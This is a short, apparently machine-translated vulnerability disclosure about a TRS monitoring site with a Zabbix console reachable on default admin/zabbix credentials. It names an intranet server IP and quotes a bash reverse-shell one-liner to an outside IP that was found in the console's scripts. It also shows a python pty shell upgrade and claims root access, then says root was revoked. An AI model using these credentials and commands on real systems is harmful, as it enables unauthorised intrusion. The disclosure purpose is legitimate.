Default Account and command execution of a website in TRS (intrusion traces can be found in Intranet & amp)

Source: Internet
Author: User

Default Account and command execution of a website in TRS (you can access the Intranet and find intrusion traces)

Command Execution
The default admin/zabbix account and password exist in om.trs.cn: 9200.
 

I have read serverip: 192.9.200.29 is indeed an intranet, and it is an online environment, which has a great impact on in-depth use.
 



Confirm again for internal use of TRS.
 



By viewing Administration -- Scripts, you can find that someone has used the following command:
 

bash -i >& /dev/tcp/131.155.176.51/9999 0>&1


 


 



Query the IP address and find that it is from the Netherlands.

Then run the script to execute the command rebound:

Cat/etc/hosts
 



View ps-ef:
 


 

python -c ‘import pty; pty.spawn(“/bin/sh”)’

The built-in python can be used to obtain an interactive shell so that we can obtain the root permission.

The privilege zabbix is returned, and the privilege root has been revoked.

 

Solution:

Ask the vendor for self-check.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.